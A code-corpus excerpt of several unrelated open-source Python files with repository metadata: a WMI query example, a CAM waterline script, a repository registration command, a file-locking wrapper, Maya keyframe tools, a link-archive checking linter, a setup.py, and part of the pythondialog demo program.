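# the surrounding Zenoss code, not by this file.
def _example_wmi_usage(eventContext):
    def inner(driver):
        q = Query()
        # connect() and query() return deferreds; driver.next() hands back
        # the value of the last yielded deferred once it fires.
        yield q.connect(eventContext, 'exampleDevice', 'example-host',
                        'EXAMPLEDOMAIN\\user%password')
        driver.next()
        yield q.query('SELECT Name FROM Win32_Process')
        result = driver.next()
        yield result.fetchSome(chunkSize=50)
        for obj in driver.next():
            log.debug("process name: %s", obj.name)
        result.close()
        q.close()
        driver.finish(None)
    return drive(inner)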
|
NetNow/wmi-samba
|
pysamba/wbem/Query.py
|
Python
|
gpl-2.0
| 9,256
|
[
"VisIt"
] |
660165c068ac8883ed63d5240ceed0a4a728e4be0e0dc34aed7661bb91d2a377
|
import ocl
import camvtk
import time
import vtk
import datetime
import math
def waterline_time(zheights, diam, length, s, sampling):
t_total = time.time()
for zh in zheights:
cutter = ocl.BallCutter( diam , length )
wl = ocl.Waterline()
wl.setSTL(s)
wl.setCutter(cutter)
wl.setZ(zh)
wl.setSampling(sampling)
wl.setThreads(1)
wl.run()
cutter_loops = wl.getLoops()
for l in cutter_loops:
            loops.append(l) # gathered into the module-level 'loops' list defined below
timeTotal = time.time()-t_total
print " ALL Waterlines done in ", timeTotal ," s"
return timeTotal
if __name__ == "__main__":
print ocl.version()
a = ocl.Point(0,1,0.3)
b = ocl.Point(1,0.5,0.3)
c = ocl.Point(0,0,0)
t = ocl.Triangle(b,c,a)
s = ocl.STLSurf()
s.addTriangle(t) # a one-triangle STLSurf
# alternatively, run on the tux model
stl = camvtk.STLSurf("../../stl/gnu_tux_mod.stl")
#myscreen.addActor(stl)
#stl.SetWireframe() # render tux as wireframe
#stl.SetSurface() # render tux as surface
#stl.SetColor(camvtk.cyan)
polydata = stl.src.GetOutput()
s = ocl.STLSurf()
camvtk.vtkPolyData2OCLSTL(polydata, s)
    # the z-coordinates for the waterlines; the assignments below override
    # one another, so only the last list (a single height) is actually used
    zheights=[-0.3, -0.2, -0.1, -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.25, 0.26, 0.27, 0.28, 0.29 ]
    zheights=[-0.8, -0.7, -0.6, -0.5, -0.4, -0.3, -0.2, -0.1, -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.28 ]
    zheights=[ -0.05, 0.0, 0.05, 0.1, 0.15, 0.2, 0.28]
    zheights=[ 1.75145 ]
    diam = 0.6 # cutter diameter
length = 5
loops = []
    cutter = ocl.CylCutter( 1 , 1 ) # not used below; waterline_time() builds its own BallCutter
sampling=0.005
waterline_time(zheights, diam, length,s,sampling)
|
JohnyEngine/CNC
|
opencamlib/scripts/waterline/waterline_6_weave2.py
|
Python
|
apache-2.0
| 1,754
|
[
"VTK"
] |
87c433fb3a81a315cd28bfc17f88fd4c54e75990eeb338345623216d41ce1351
|
# Copyright (C) 2013, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from __future__ import print_function
import os
from os.path import join
import json
from zeroinstall import support
from zeroinstall.support import basedir
from repo import cmd
def handle(args):
cmd.find_config()
config = cmd.load_config()
path = join(basedir.save_config_path('0install.net', '0repo'), 'repositories.json')
if os.path.exists(path):
with open(path, 'rb') as stream:
db = json.load(stream)
else:
db = {}
existing = db.get(config.REPOSITORY_BASE_URL, None)
entry = {'type': 'local', 'path': os.getcwd()}
if existing and existing == entry:
print("Already registered in {path} (no changes made):\n{base}: {json}".format(
path = path,
base = config.REPOSITORY_BASE_URL,
json = json.dumps(entry)))
return
db[config.REPOSITORY_BASE_URL] = entry
with open(path + '.new', 'wb') as stream:
json.dump(db, stream)
support.portable_rename(path + '.new', path)
if existing:
print("Updated entry in {path} to:".format(path = path))
else:
print("Created new entry in {path}:".format(path = path))
print("{base}: {json}".format(base = config.REPOSITORY_BASE_URL, json = json.dumps(entry)))
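# Example of what the resulting repositories.json looks like after a
# successful registration (illustrative only; the URL and path below are
# placeholders, not values used by 0repo itself):
#
#   {
#       "http://example.com/repo/": {"type": "local", "path": "/home/user/my-repo"}
#   }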
|
bastianeicher/0repo
|
repo/cmd/register.py
|
Python
|
lgpl-2.1
| 1,246
|
[
"VisIt"
] |
66f914aa3e8d08c186da569e288e4577918abebe3fd93abf94798514c2dc08be
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# --- BEGIN_HEADER ---
#
# serverfile - file wrapper interface for server IO
# Copyright (C) 2003-2009 The MiG Project lead by Brian Vinter
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# -- END_HEADER ---
#
# Script version (automagically updated by cvs)
"""This file contains a file wrapper interface for server IO. It should
be used as a template for other IO modules that hide the underlying
physical location of server files.
"""
__version__ = '$Revision: 1564 $'
__revision__ = __version__
# $Id: serverfile.py 1564 2006-10-24 14:43:46Z jones $
import fcntl
# File locking states
LOCK_UN = fcntl.LOCK_UN
LOCK_SH = fcntl.LOCK_SH
LOCK_EX = fcntl.LOCK_EX
# File operations
class ServerFile(file):
"""File object wrapper to provide the usual file interface with
local or distributed files underneath. We simply inherit file
operations from builtin file class here. This class should be
subclassed in order to provide remote server file operation.
"""
def __init__(
self,
path,
mode='r',
bufsize=-1,
):
"""Create local file and set default object attributes"""
file.__init__(self, path, mode, bufsize)
def lock(self, mode):
"""Additional method interface to integrate file locking with
file objects.
"""
        raise LockingException(
            'This is an interface class! use a subclass and implement locking there!')
def unlock(self):
"""Additional method interface to integrate file locking with
file objects.
"""
        raise LockingException(
            'This is an interface class! use a subclass and implement locking there!')
def __str__(self):
return file.__str__(self)
class LockingException(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
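# --------------------------------------------------------------------------
# Illustrative sketch (not part of the original MiG module): a minimal local
# subclass implementing the lock()/unlock() interface with fcntl and the
# LOCK_* constants defined above.  MiG provides its own subclasses for
# distributed files; this one only demonstrates the expected interface.
class LocalServerFile(ServerFile):
    """ServerFile backed by an ordinary local file with fcntl locking"""

    def lock(self, mode):
        """Acquire a shared (LOCK_SH) or exclusive (LOCK_EX) lock"""
        fcntl.flock(self.fileno(), mode)

    def unlock(self):
        """Release any lock held on the underlying file"""
        fcntl.flock(self.fileno(), LOCK_UN)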
|
heromod/migrid
|
mig/shared/serverfile.py
|
Python
|
gpl-2.0
| 2,686
|
[
"Brian"
] |
d9aa4fdb7d70ac22fa8b08215ff8dfc80f0de263fb6f100e41f423371bf234ea
|
'''TB Animation Tools is a toolset for animators
*******************************************************************************
License and Copyright
Copyright 2015-Tom Bailey
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
this script holds a bunch of useful keyframe related functions to make life easier
send issues/ requests to brimblashman@gmail.com
visit tb-animator.blogspot.com for "stuff"
*******************************************************************************
'''
import pymel.core as pm
import tb_timeline as tl
import maya.mel as mel
import maya.cmds as cmds
class keys():
def __init__(self):
pass
def get(self):
pass
@staticmethod
def get_selected_curves():
""" returns the currently selected curve names
"""
return pm.keyframe(query=True, selected=True, name=True)
@staticmethod
def get_selected_keys():
""" returns the currently selected curve names
"""
return pm.keyframe(query=True, selected=True)
@staticmethod
def get_selected_keycount():
return pm.keyframe(selected=True, query=True, keyframeCount=True)
@staticmethod
def get_key_times(curve):
return pm.keyframe(curve, query=True, selected=True, timeChange=True)
@staticmethod
def get_key_values(curve):
return pm.keyframe(curve, query=True, selected=True, valueChange=True)
@staticmethod
def get_key_values_from_range(curve, time_range):
return pm.keyframe(curve, query=True, time=time_range, valueChange=True)
class key_mod():
def __init__(self):
pass
def match(self, data):
## match tangents for looping animations
#
# from tb_keyframe import key_mod
# key_mod().match("start")
# or
# key_mod().match("end")
#
        __dict = {'start': True, 'end': False}
state = __dict[data]
print "state", state
print "mode", data
range = tl.timeline().get_range()
s = range[state]
e = range[not state]
print "start", s, "end", e
animcurves = pm.keyframe(query=True, name=True)
tangent = []
if animcurves and len(animcurves):
for curve in animcurves:
tangent = pm.keyTangent(curve, query=True, time=(s, s), outAngle=True, inAngle=True)
print "tangent", tangent
pm.keyTangent(curve, edit=True, lock=False, time=(e, e),
outAngle=tangent[state], inAngle=tangent[not state])
else:
print "no anim curves found"
class channels():
def __init__(self):
self.gChannelBoxName = mel.eval('$temp=$gChannelBoxName')
pass
def getChannels(self, *arg):
chList = cmds.channelBox(self.gChannelBoxName,
query=True,
selectedMainAttributes=True)
if chList:
for channel in chList:
print channel
else:
print "no channels selected"
return chList
def filterChannels(self):
'''
import filterChannels as ft
reload (ft)
ft.filterChannels()
'''
channels = self.getChannels()
selection = cmds.ls(selection=True)
if selection and channels:
cmds.selectionConnection('graphEditor1FromOutliner',edit=True,clear=True)
for sel in selection:
for channel in channels:
curve = sel+"."+channel
cmds.selectionConnection('graphEditor1FromOutliner',edit=True,object=curve)
def toggleMuteChannels(self):
'''
import filterChannels as ft
reload (ft)
ft.toggleMuteChannels()
'''
channels = self.getChannels()
selection = cmds.ls(selection=True)
if selection and channels:
for sel in selection:
for channel in channels:
curve = sel+"."+channel
cmds.mute(sel+"."+channel,
disable=cmds.mute(sel+"."+channel, query=True))
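# --------------------------------------------------------------------------
# Illustrative sketch (not part of the original toolset): prints the
# time/value pairs of the currently selected keys by combining the static
# helpers on the 'keys' class above.  Run it with keys selected in Maya's
# graph editor.
def print_selected_keys():
    curves = keys.get_selected_curves()
    if not curves:
        print "no keys selected"
        return
    for curve in curves:
        times = keys.get_key_times(curve)
        values = keys.get_key_values(curve)
        print curve
        for t, v in zip(times, values):
            print "\t", t, v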
|
tb-animator/tbtools
|
apps/tb_keyframe.py
|
Python
|
mit
| 4,823
|
[
"VisIt"
] |
968a7b276fcc26ccc7465fcb55c19ae0dc53dc713bb43d3548a6903839527119
|
import requests
from bears.general.URLHeadBear import URLHeadBear
from coalib.bears.LocalBear import LocalBear
from coalib.results.Result import Result
from coalib.results.RESULT_SEVERITY import RESULT_SEVERITY
from dependency_management.requirements.PipRequirement import PipRequirement
from memento_client import MementoClient
class MementoBear(LocalBear):
DEFAULT_TIMEOUT = 15
LANGUAGES = {'All'}
REQUIREMENTS = {PipRequirement('memento_client', '0.6.1')}
AUTHORS = {'The coala developers'}
AUTHORS_EMAILS = {'coala-devel@googlegroups.com'}
LICENSE = 'AGPL-3.0'
CAN_DETECT = {'Documentation'}
BEAR_DEPS = {URLHeadBear}
@staticmethod
def check_archive(mc, link):
"""
        Check whether the given link has been archived.
:param mc: A `memento_client.MementoClient` instance.
:param link: The link (str) that will be checked.
:return: Boolean, `True` means the link has been archived.
"""
try:
mc.get_memento_info(link)['mementos']
except KeyError:
return False
return True
@staticmethod
def get_redirect_urls(link):
urls = []
resp = requests.head(link, allow_redirects=True)
for redirect in resp.history:
urls.append(redirect.url)
return urls
def run(self, filename, file, dependency_results=dict(),
follow_redirects: bool = True,
):
"""
Find links in any text file and check if they are archived.
        A link is considered valid if it has been archived by any of the
        services known to memento_client.
        When ``follow_redirects`` is enabled, the redirect targets of each
        link are checked as well.
Warning: This bear will make HEAD requests to all URLs mentioned in
your codebase, which can potentially be destructive. As an example,
this bear would naively just visit the URL from a line that goes like
`do_not_ever_open = 'https://api.acme.inc/delete-all-data'` wiping out
all your data.
:param dependency_results: Results given by URLHeadBear.
:param follow_redirects: Set to true to check all redirect urls.
"""
self._mc = MementoClient()
for result in dependency_results.get(URLHeadBear.name, []):
line_number, link, code, context = result.contents
if not (code and 200 <= code < 400):
continue
status = MementoBear.check_archive(self._mc, link)
if not status:
yield Result.from_values(
self,
('This link is not archived yet, visit '
'https://web.archive.org/save/%s to get it archived.'
% link),
file=filename,
line=line_number,
severity=RESULT_SEVERITY.INFO
)
if follow_redirects and 300 <= code < 400: # HTTP status 30x
redirect_urls = MementoBear.get_redirect_urls(link)
for url in redirect_urls:
status = MementoBear.check_archive(self._mc, url)
if not status:
yield Result.from_values(
self,
('This link redirects to %s and not archived yet, '
'visit https://web.archive.org/save/%s to get it '
'archived.'
% (url, url)),
file=filename,
line=line_number,
severity=RESULT_SEVERITY.INFO
)
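# --------------------------------------------------------------------------
# Illustrative standalone usage sketch (not part of the bear's coala
# interface).  check_archive() and MementoClient are the same objects used by
# run() above; the URL is a placeholder.
def _example_check(url='https://example.com/some/page'):
    mc = MementoClient()
    if MementoBear.check_archive(mc, url):
        return '{} is already archived'.format(url)
    return '{} is not archived yet'.format(url)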
|
refeed/coala-bears
|
bears/general/MementoBear.py
|
Python
|
agpl-3.0
| 3,680
|
[
"VisIt"
] |
4edfa9c68acc1802bcedaf6d2fbcb5ea79fea93ba588a5f37eeab9963c48737d
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='qc18SV4',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.0.2',
description='A quality control pipeline for 18S V4',
long_description=long_description,
# The project's main homepage.
url='https://github.com/hurwitzlab/muscope-18SV4',
# Author details
author='Sarah Hu, Joshua Lynch',
author_email='shu251@gmail.com, jklynch@email.arizona.edu',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 5 - Production/Stable',
# Indicate who your project is intended for
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7'
],
# What does your project relate to?
keywords='metagenomics quality control',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[
'biopython'
],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'dev': [],
'test': ['pytest'],
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
##package_data={
## 'sample': ['package_data.dat'],
##},
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
##data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
entry_points={
'console_scripts': [
'pipeline=qc18SV4.pipeline:main',
'write_launcher_job_file=qc18SV4.write_launcher_job_file:main'
],
},
)
|
hurwitzlab/muscope-18SV4
|
setup.py
|
Python
|
mit
| 3,883
|
[
"Biopython"
] |
2517f7de39684b0f80ac7be10db29fe62feaeb9ed392793b9598bdd72a8fc2af
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# demo.py --- Demonstration program and cheap test suite for pythondialog
#
# Copyright (C) 2002-2010, 2013-2016 Florent Rougon
# Copyright (C) 2000 Robb Shecter, Sultanbek Tezadov
#
# This program is in the public domain.
"""Demonstration program for pythondialog.
This is a program demonstrating most of the possibilities offered by
the pythondialog module (which is itself a Python interface to the
well-known dialog utility, or any other program compatible with
dialog).
Executive summary
-----------------
If you are looking for a very simple example of pythondialog usage,
short and straightforward, please refer to simple_example.py. The
file you are now reading serves more as a demonstration of what can
be done with pythondialog and as a cheap test suite than as a first
time tutorial. However, it can also be used to learn how to invoke
the various widgets. The following paragraphs explain what you should
keep in mind if you read it for this purpose.
Most of the code in the MyApp class (which defines the actual
contents of the demo) relies on a class called MyDialog implemented
here that:
1. wraps all widget-producing calls in a way that automatically
spawns a "confirm quit" dialog box if the user presses the
Escape key or chooses the Cancel button, and then redisplays the
original widget if the user doesn't actually want to quit;
2. provides a few additional dialog-related methods and convenience
wrappers.
The handling in (1) is completely automatic, implemented with
MyDialog.__getattr__() returning decorated versions of the
widget-producing methods of dialog.Dialog. Therefore, most of the
demo can be read as if the module-level 'd' attribute were a
dialog.Dialog instance whereas it is actually a MyDialog instance.
The only meaningful difference is that MyDialog.<widget>() will never
return a CANCEL or ESC code (attributes of 'd', or more generally of
dialog.Dialog). The reason is that these return codes are
automatically handled by the MyDialog.__getattr__() machinery to
display the "confirm quit" dialog box.
In some cases (e.g., fselect_demo()), I wanted the "Cancel" button to
perform a specific action instead of spawning the "confirm quit"
dialog box. To achieve this, the widget is invoked using
dialog.Dialog.<widget> instead of MyDialog.<widget>, and the return
code is handled in a semi-manual way. A prominent feature that needs
such special-casing is the yesno widget, because the "No" button
corresponds to the CANCEL exit code, which in general must not be
interpreted as an attempt to quit the program!
To sum it up, you can read most of the code in the MyApp class (which
defines the actual contents of the demo) as if 'd' were a
dialog.Dialog instance. Just keep in mind that there is a little
magic behind the scenes that automatically handles the CANCEL and ESC
Dialog exit codes, which wouldn't be the case if 'd' were a
dialog.Dialog instance. For a first introduction to pythondialog with
simple stuff and absolutely no magic, please have a look at
simple_example.py.
"""
import sys, os, locale, stat, time, getopt, subprocess, traceback, textwrap
import pprint
import dialog
from dialog import DialogBackendVersion
progname = os.path.basename(sys.argv[0])
progversion = "0.12"
version_blurb = """Demonstration program and cheap test suite for pythondialog.
Copyright (C) 2002-2010, 2013-2016 Florent Rougon
Copyright (C) 2000 Robb Shecter, Sultanbek Tezadov
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE."""
default_debug_filename = "pythondialog.debug"
usage = """Usage: {progname} [option ...]
Demonstration program and cheap test suite for pythondialog.
Options:
-t, --test-suite test all widgets; implies '--fast'
-f, --fast fast mode (e.g., makes the gauge demo run faster)
--debug enable logging of all dialog command lines
--debug-file=FILE where to write debug information (default:
{debug_file} in the current directory)
-E, --debug-expand-file-opt expand the '--file' options in the debug file
generated by '--debug'
--help display this message and exit
--version output version information and exit""".format(
progname=progname, debug_file=default_debug_filename)
# Global parameters
params = {}
# We'll use a module-level attribute 'd' ("global") to store the MyDialog
# instance that is used throughout the demo. This object could alternatively be
# passed to the MyApp constructor and stored there as a class or instance
# attribute. However, for the sake of readability, we'll simply use a global
# (d.msgbox(...) versus self.d.msgbox(...), etc.).
d = None
tw = textwrap.TextWrapper(width=78, break_long_words=False,
break_on_hyphens=True)
from textwrap import dedent
try:
from textwrap import indent
except ImportError:
try:
callable # Normally, should be __builtins__.callable
except NameError:
# Python 3.1 doesn't have the 'callable' builtin function. Let's
# provide ours.
def callable(f):
return hasattr(f, '__call__')
def indent(text, prefix, predicate=None):
l = []
for line in text.splitlines(True):
if (callable(predicate) and predicate(line)) \
or (not callable(predicate) and predicate) \
or (predicate is None and line.strip()):
line = prefix + line
l.append(line)
return ''.join(l)
class MyDialog:
"""Wrapper class for dialog.Dialog.
This class behaves similarly to dialog.Dialog. The differences
are that:
1. MyDialog wraps all widget-producing methods in a way that
automatically spawns a "confirm quit" dialog box if the user
presses the Escape key or chooses the Cancel button, and
then redisplays the original widget if the user doesn't
actually want to quit.
2. MyDialog provides a few additional dialog-related methods
and convenience wrappers.
Please refer to the module docstring and to the particular
methods for more details.
"""
def __init__(self, Dialog_instance):
self.dlg = Dialog_instance
def check_exit_request(self, code, ignore_Cancel=False):
if code == self.CANCEL and ignore_Cancel:
# Ignore the Cancel button, i.e., don't interpret it as an exit
# request; instead, let the caller handle CANCEL himself.
return True
if code in (self.CANCEL, self.ESC):
button_name = { self.CANCEL: "Cancel",
self.ESC: "Escape" }
msg = "You pressed {0} in the last dialog box. Do you want " \
"to exit this demo?".format(button_name[code])
# 'self.dlg' instead of 'self' here, because we want to use the
# original yesno() method from the Dialog class instead of the
# decorated method returned by self.__getattr__().
if self.dlg.yesno(msg) == self.OK:
sys.exit(0)
else: # "No" button chosen, or ESC pressed
return False # in the "confirm quit" dialog
else:
return True
def widget_loop(self, method):
"""Decorator to handle eventual exit requests from a Dialog widget.
method -- a dialog.Dialog method that returns either a Dialog
exit code, or a sequence whose first element is a
Dialog exit code (cf. the docstring of the Dialog
class in dialog.py)
Return a wrapper function that behaves exactly like 'method',
except for the following point:
If the Dialog exit code obtained from 'method' is CANCEL or
ESC (attributes of dialog.Dialog), a "confirm quit" dialog
is spawned; depending on the user choice, either the
program exits or 'method' is called again, with the same
arguments and same handling of the exit status. In other
words, the wrapper function builds a loop around 'method'.
The above condition on 'method' is satisfied for all
dialog.Dialog widget-producing methods. More formally, these
are the methods defined with the @widget decorator in
dialog.py, i.e., that have an "is_widget" attribute set to
True.
"""
# One might want to use @functools.wraps here, but since the wrapper
# function is very likely to be used only once and then
# garbage-collected, this would uselessly add a little overhead inside
# __getattr__(), where widget_loop() is called.
def wrapper(*args, **kwargs):
while True:
res = method(*args, **kwargs)
if hasattr(method, "retval_is_code") \
and getattr(method, "retval_is_code"):
code = res
else:
code = res[0]
if self.check_exit_request(code):
break
return res
return wrapper
def __getattr__(self, name):
# This is where the "magic" of this class originates from.
# Please refer to the module and self.widget_loop()
# docstrings if you want to understand the why and the how.
obj = getattr(self.dlg, name)
if hasattr(obj, "is_widget") and getattr(obj, "is_widget"):
return self.widget_loop(obj)
else:
return obj
def clear_screen(self):
# This program comes with ncurses
program = "clear"
try:
p = subprocess.Popen([program], shell=False, stdout=None,
stderr=None, close_fds=True)
retcode = p.wait()
except os.error as e:
self.msgbox("Unable to execute program '%s': %s." % (program,
e.strerror),
title="Error")
return False
if retcode > 0:
msg = "Program %s returned exit status %d." % (program, retcode)
elif retcode < 0:
msg = "Program %s was terminated by signal %d." % (program, -retcode)
else:
return True
self.msgbox(msg)
return False
def _Yesno(self, *args, **kwargs):
"""Convenience wrapper around dialog.Dialog.yesno().
Return the same exit code as would return
dialog.Dialog.yesno(), except for ESC which is handled as in
the rest of the demo, i.e. make it spawn the "confirm quit"
dialog.
"""
# self.yesno() automatically spawns the "confirm quit" dialog if ESC or
# the "No" button is pressed, because of self.__getattr__(). Therefore,
# we have to use self.dlg.yesno() here and call
# self.check_exit_request() manually.
while True:
code = self.dlg.yesno(*args, **kwargs)
# If code == self.CANCEL, it means the "No" button was chosen;
# don't interpret this as a wish to quit the program!
if self.check_exit_request(code, ignore_Cancel=True):
break
return code
def Yesno(self, *args, **kwargs):
"""Convenience wrapper around dialog.Dialog.yesno().
Return True if "Yes" was chosen, False if "No" was chosen,
and handle ESC as in the rest of the demo, i.e. make it spawn
the "confirm quit" dialog.
"""
return self._Yesno(*args, **kwargs) == self.dlg.OK
def Yesnohelp(self, *args, **kwargs):
"""Convenience wrapper around dialog.Dialog.yesno().
Return "yes", "no", "extra" or "help" depending on the button
that was pressed to close the dialog. ESC is handled as in
the rest of the demo, i.e. it spawns the "confirm quit"
dialog.
"""
kwargs["help_button"] = True
code = self._Yesno(*args, **kwargs)
d = { self.dlg.OK: "yes",
self.dlg.CANCEL: "no",
self.dlg.EXTRA: "extra",
self.dlg.HELP: "help" }
return d[code]
# Dummy context manager to make sure the debug file is closed on exit, be it
# normal or abnormal, and to avoid having two code paths, one for normal mode
# and one for debug mode.
class DummyContextManager:
def __enter__(self):
return self
def __exit__(self, *exc):
return False
class MyApp:
def __init__(self):
# The MyDialog instance 'd' could be passed via the constructor and
# stored here as a class or instance attribute. However, for the sake
# of readability, we'll simply use a module-level attribute ("global")
# (d.msgbox(...) versus self.d.msgbox(...), etc.).
global d
# If you want to use Xdialog (pathnames are also OK for the 'dialog'
# argument), you can use:
# dialog.Dialog(dialog="Xdialog", compat="Xdialog")
self.Dialog_instance = dialog.Dialog(dialog="dialog")
# See the module docstring at the top of the file to understand the
# purpose of MyDialog.
d = MyDialog(self.Dialog_instance)
backtitle = "pythondialog demo"
d.set_background_title(backtitle)
# These variables take the background title into account
self.max_lines, self.max_cols = d.maxsize(backtitle=backtitle)
self.demo_context = self.setup_debug()
# Warn if the terminal is smaller than this size
self.min_rows, self.min_cols = 24, 80
self.term_rows, self.term_cols, self.backend_version = \
self.get_term_size_and_backend_version()
def setup_debug(self):
if params["debug"]:
debug_file = open(params["debug_filename"], "w")
d.setup_debug(True, file=debug_file,
expand_file_opt=params["debug_expand_file_opt"])
return debug_file
else:
return DummyContextManager()
def get_term_size_and_backend_version(self):
# Avoid running '<backend> --print-version' every time we need the
# version
backend_version = d.cached_backend_version
if not backend_version:
print(tw.fill(
"Unable to retrieve the version of the dialog-like backend. "
"Not running cdialog?") + "\nPress Enter to continue.",
file=sys.stderr)
input()
term_rows, term_cols = d.maxsize(use_persistent_args=False)
if term_rows < self.min_rows or term_cols < self.min_cols:
print(tw.fill(dedent("""\
Your terminal has less than {0} rows or less than {1} columns;
you may experience problems with the demo. You have been warned."""
.format(self.min_rows, self.min_cols)))
+ "\nPress Enter to continue.")
input()
return (term_rows, term_cols, backend_version)
def run(self):
with self.demo_context:
if params["testsuite_mode"]:
# Show the additional widgets before the "normal demo", so that
# I can test new widgets quickly and simply hit Ctrl-C once
# they've been shown.
self.additional_widgets()
# "Normal" demo
self.demo()
def demo(self):
d.msgbox("""\
Hello, and welcome to the pythondialog {pydlg_version} demonstration program.
You can scroll through this dialog box with the Page Up and Page Down keys. \
Please note that some of the dialogs will not work, and cause the demo to \
stop, if your terminal is too small. The recommended size is (at least) \
{min_rows} rows by {min_cols} columns.
This script is being run by a Python interpreter identified as follows:
{py_version}
The dialog-like program displaying this message box reports version \
{backend_version} and a terminal size of {rows} rows by {cols} columns."""
.format(
pydlg_version=dialog.__version__,
backend_version=self.backend_version,
py_version=indent(sys.version, " "),
rows=self.term_rows, cols=self.term_cols,
min_rows=self.min_rows, min_cols=self.min_cols),
width=60, height=17)
self.progressbox_demo_with_file_descriptor()
# First dialog version where the programbox widget works fine
if self.dialog_version_check("1.2-20140112"):
self.programbox_demo()
self.infobox_demo()
self.gauge_demo()
answer = self.yesno_demo(with_help=True)
self.msgbox_demo(answer)
self.textbox_demo()
name = self.inputbox_demo_with_help()
size, weight, city, state, country, last_will1, last_will2, \
last_will3, last_will4, secret_code = self.mixedform_demo()
self.form_demo_with_help()
favorite_day = self.menu_demo(name, city, state, country, size, weight,
secret_code, last_will1, last_will2,
last_will3, last_will4)
if self.dialog_version_check("1.2-20130902",
"the menu demo with help facilities",
explain=True):
self.menu_demo_with_help()
toppings = self.checklist_demo()
if self.dialog_version_check("1.2-20130902",
"the checklist demo with help facilities",
explain=True):
self.checklist_demo_with_help()
sandwich = self.radiolist_demo()
if self.dialog_version_check("1.2-20121230", "the rangebox demo", explain=True):
nb_engineers = self.rangebox_demo()
else:
nb_engineers = None
if self.dialog_version_check("1.2-20121230", "the buildlist demo", explain=True):
desert_island_stuff = self.buildlist_demo()
else:
desert_island_stuff = None
if self.dialog_version_check("1.2-20130902",
"the buildlist demo with help facilities",
explain=True):
self.buildlist_demo_with_help()
date = self.calendar_demo_with_help()
time_ = self.timebox_demo()
password = self.passwordbox_demo()
self.scrollbox_demo(name, favorite_day, toppings, sandwich,
nb_engineers, desert_island_stuff, date, time_,
password)
if self.dialog_version_check("1.2-20121230", "the treeview demo",
explain=True):
if self.dialog_version_check("1.2-20130902"):
self.treeview_demo_with_help()
else:
self.treeview_demo()
self.mixedgauge_demo()
self.editbox_demo("/etc/passwd")
self.inputmenu_demo()
d.msgbox("""\
Haha. You thought it was over. Wrong. Even more fun is to come!
Now, please select a file you would like to see growing (or not...).""",
width=75)
# Looks nicer if the screen is not completely filled by the widget,
# hence the -1.
self.tailbox_demo(height=self.max_lines-1,
width=self.max_cols)
directory = self.dselect_demo()
timeout = 2 if params["fast_mode"] else 20
self.pause_demo(timeout)
d.clear_screen()
if not params["fast_mode"]:
# Rest assured, this is not necessary in any way: it is only a
# psychological trick to try to give the impression of a reboot
# (cf. pause_demo(); would be even nicer with a "visual bell")...
time.sleep(1)
def additional_widgets(self):
# Requires a careful choice of the file to be of any interest
self.progressbox_demo_with_filepath()
# This can be confusing without any pause if the user specified a
# regular file.
time.sleep(1 if params["fast_mode"] else 2)
# programbox_demo is fine right after
# progressbox_demo_with_file_descriptor in demo(), but there was a
# little bug in dialog that made the first two lines disappear too
# early. This bug has been fixed in version 1.2-20140112, therefore
# we'll run the programbox_demo as part of the main demo if the dialog
# version is >= than this one, otherwise we'll keep it here.
if self.dialog_version_check("1.1-20110302", "the programbox demo",
explain=True):
# First dialog version where the programbox widget works fine
if not self.dialog_version_check("1.2-20140112"):
self.programbox_demo()
# Almost identical to mixedform (mixedform being more powerful). Also,
# there is now form_demo_with_help() which uses the form widget.
